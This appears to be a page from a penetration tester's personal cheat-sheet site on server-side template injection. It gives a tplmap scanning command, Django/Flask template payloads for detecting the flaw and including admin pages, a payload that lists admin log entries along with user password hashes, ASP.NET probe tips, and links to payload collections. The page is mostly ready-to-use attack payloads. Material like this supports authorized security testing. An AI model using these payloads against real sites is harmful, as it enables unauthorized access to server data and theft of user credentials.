caon.io
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage

SSTI

Tools 

# https://github.com/epinna/tplmap
tplmap.py -u 'http://www.target.com/page?name=John'

Python Django/Flask

Detection:

{% if 'str' = 'str' %} vuln {% endif %}
{% debug %}

Disclose pages:

{% include 'admin/base.html' %}

Disclose log table:

{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}

ASP/APS.NET/ASPX

  • % is a key character
  • If <% returns 500, try <%= 7*7 %>

Tips

Try to SSTI with the fuzz string provided in cobalt.io blog post refered below

URL Description
https://github.com/DiogoMRSilva/websitesVulnerableToSSTI Engines vulnerable to SSTI
https://github.com/payloadbox/ssti-payloads Payloads
https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti Blog about SSTI
gdoc_arrow_left_alt RCE SSRF gdoc_arrow_right_alt